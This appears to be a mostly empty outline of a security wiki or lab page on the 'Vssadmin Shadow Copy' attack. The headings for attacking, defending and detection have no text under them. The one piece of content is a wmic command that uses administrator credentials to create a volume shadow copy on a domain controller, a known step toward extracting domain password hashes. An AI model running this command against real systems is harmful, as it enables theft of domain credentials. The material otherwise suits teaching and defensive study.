Vssadmin Shadow Copy
Configuring
Attacking
How it works
Tools
Executing the attack
wmic /node:dc02 /user:administrator@amsterdam.bank.local /password:'Welcome01!' process call create "cmd /c vssadmin create shadow /for=C: 2>&1"





Defending
Recommendations
Detection
References
Last updated